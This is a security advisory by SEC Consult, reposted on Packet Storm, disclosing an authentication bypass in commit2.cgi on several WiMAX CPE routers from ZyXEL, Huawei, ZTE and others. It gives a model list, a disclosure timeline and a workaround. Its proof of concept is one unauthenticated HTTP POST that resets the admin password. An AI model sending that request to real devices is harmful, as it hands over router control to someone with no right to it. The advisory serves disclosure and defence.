exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WiMAX CPE Authentication Bypass

WiMAX CPE Authentication Bypass
Posted Jun 7, 2017
Authored by Stefan Viehboeck | Site sec-consult.com

Various WiMAX CPEs are vulnerable to an authentication bypass. An attacker can set arbitrary configuration values without prior authentication. The vulnerability is located in commit2.cgi (implemented in libmtk_httpd_plugin.so).

tags | exploit, arbitrary, cgi
SHA-256 | 1c406ac717264e13cef5f2341197c0e2013b4a9fe6fe7c509442d497b4bb32b7

WiMAX CPE Authentication Bypass

Change Mirror Download
We have published an accompanying blog post to this technical advisory with
further information:
http://blog.sec-consult.com/2017/06/ghosts-from-past-authentication-bypass.html

SEC Consult Vulnerability Lab Security Advisory < 20170607-0 >
=======================================================================
title: Various WiMAX CPEs Authentication Bypass
product: see "Vulnerable / tested versions"
vulnerable version: see "Vulnerable / tested versions"
fixed version:
CVE number:
impact: Critical
homepage:
found: 2016-08-22
by: Stefan ViehbAPck (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
Various vendors are affected. See "Vulnerable / tested versions".


Business recommendation:
------------------------
SEC Consult recommends to decommission affected devices.


Vulnerability overview/description:
-----------------------------------
Various WiMAX CPEs are vulnerable to an authentication bypass. An attacker
can set arbitrary configuration values without prior authentication.
The vulnerability is located in commit2.cgi (implemented in libmtk_httpd_plugin.so)


Proof of concept:
-----------------
The following HTTP request sets the admin username and password (configuration
ADMIN_PASSWD) to "admin".
An attacker can now login in with admin permissions.

POST /commit2.cgi HTTP/1.1
Host: 1.2.3.4
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

ADMIN_PASSWD=$1$ZZ0DVlc6$QLqFLzW8YDZObgHtMZrYF/


Vulnerable / tested versions:
-----------------------------
The vulnerability was found in the firmware of various WiMAX CPEs.
A list of "likely" affected products is below. The firmware of these products was
developed by ZyXEL and is likely based on the MediaTek SDK.

The relation with Huawei, ZTE, MADA etc. is not clear, possibly ODM/OEM/OBM.

GreenPacket OX350 (Version: ?)
GreenPacket OX-350 (Version: ?)
Huawei BM2022 (Version: v2.10.14)
Huawei HES-309M (Version: ?)
Huawei HES-319M (Version: ?)
Huawei HES-319M2W (Version: ?)
Huawei HES-339M (Version: ?)
MADA Soho Wireless Router (Version: v2.10.13)
ZTE OX-330P (Version: ?)
ZyXEL MAX218M (Version: 2.00(UXG.0)D0)
ZyXEL MAX218M1W (Version: 2.00(UXE.3)D0)
ZyXEL MAX218MW (Version: 2.00(UXD.2)D0)
ZyXEL MAX308M (Version: 2.00(UUA.3)D0)
ZyXEL MAX318M (Version: ?)
ZyXEL MAX338M (Version: ?)

It is _very likely_, that other products are affected as well.

On some devices remote HTTP/HTTPS administration via the WAN connection is
enabled.


Vendor contact timeline:
------------------------
2016-09-09: Sending advisory draft to Huawei PSIRT.
2016-09-09: Huawei confirms receipt of advisory. Starts investigation.
2016-09-23: Huawei states that affected products are End of Service (EOS) since
2014.
2016-10-08: Sending questions regarding other affected vendors and relation to
the vendors.
2016-11-22: Huawei states that they cannot share requested information.
2017-04-04: Informing CERT/CC.
2017-06-07: Coordinated release of security advisory.


Solution:
---------
None available.


Workaround:
-----------
Restrict network access to the web interface from WAN.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Stefan ViehbAPck / @2017

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close